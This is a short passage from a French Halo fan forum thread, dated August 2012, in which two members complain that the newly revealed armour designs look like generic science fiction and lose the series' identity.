Message par B2T Bendak le Lun 20 Aoû 2012 - 14:43

@Lunaramethyst a écrit:Mais 'faut pas se leurrer : toutes les armures qu'on voit ont été conçues sur la seule base de l'esthétique.

Lorsqu'on voit le résultat encore un point qui est hélas discutable... ^^"

Il y a 2 mois je vous aurez montré ces armures sans vous dire leur provenance vous m'auriez tous dit "Les nouvelles armures de Crysis 3!" ou d'un autre jeu de science-fi mais vous m'auriez jamais parler de Halo! ^^"""

Encore une fois on perd totalement l'identité du jeu... :/

___________________________


avatar
B2T Bendak
Administrateur
Administrateur

GamerTag : B2T Bendak
Team : BouBoule
Messages : 4239
Date d'inscription : 20/01/2010
Âge : 24
Réputation : 734
Talent : nm. Aptitude naturelle.
Halo favori : Halo 2
Domaine favori : Images

Voir le profil de l'utilisateur http://www.b2tv.org/

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Lunaramethyst le Lun 20 Aoû 2012 - 16:10

Notez que je n'ai fait aucun commentaire sur l'esthétique en question. Qui est effectivement un genre de style Sci-Fi dénaturé pour plaire au public de base.

___________________________

avatar
Lunaramethyst
Légende
Légende

GamerTag : Solaramethyst
Messages : 4271
Date d'inscription : 25/08/2009
Âge : 23
Réputation : 472
Talent : Archiviste de l'univers Halo
Halo favori : Halo 3
Domaine favori : FanFictions

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Page 2 sur 3 Précédent  1, 2, 3  Suivant

Voir le sujet précédent Voir le sujet suivant Revenir en haut


 
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum